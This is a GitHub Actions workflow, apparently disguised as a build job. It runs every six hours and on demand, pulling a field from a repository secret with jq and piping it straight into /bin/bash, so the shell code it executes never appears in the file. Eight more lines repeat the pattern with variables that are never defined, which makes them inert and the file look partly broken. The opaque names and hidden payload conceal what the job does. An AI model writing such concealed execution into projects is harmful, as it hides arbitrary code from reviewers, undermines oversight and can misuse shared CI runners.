name: fangziwenni

on:
  workflow_dispatch:
  schedule:
    - cron: '52 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fangziwenni
        env:
          czop1: ${{ secrets.czop1 }}
        run: |
          echo $czop1 | jq -r .irlpm91 | /bin/bash
          echo $vmiwo7 | jq -r .tc357 | /bin/bash
          echo $lg763 | jq -r .zri503 | /bin/bash
          echo $fk4263 | jq -r .fc14020 | /bin/bash
          echo $yo8891 | jq -r .kaya1 | /bin/bash
          echo $wxk07 | jq -r .omfag9139 | /bin/bash
          echo $wpeb5 | jq -r .yhvj46090 | /bin/bash
          echo $fpipi1 | jq -r .qpa0951 | /bin/bash
          echo $oe59280 | jq -r .hurrq69 | /bin/bash

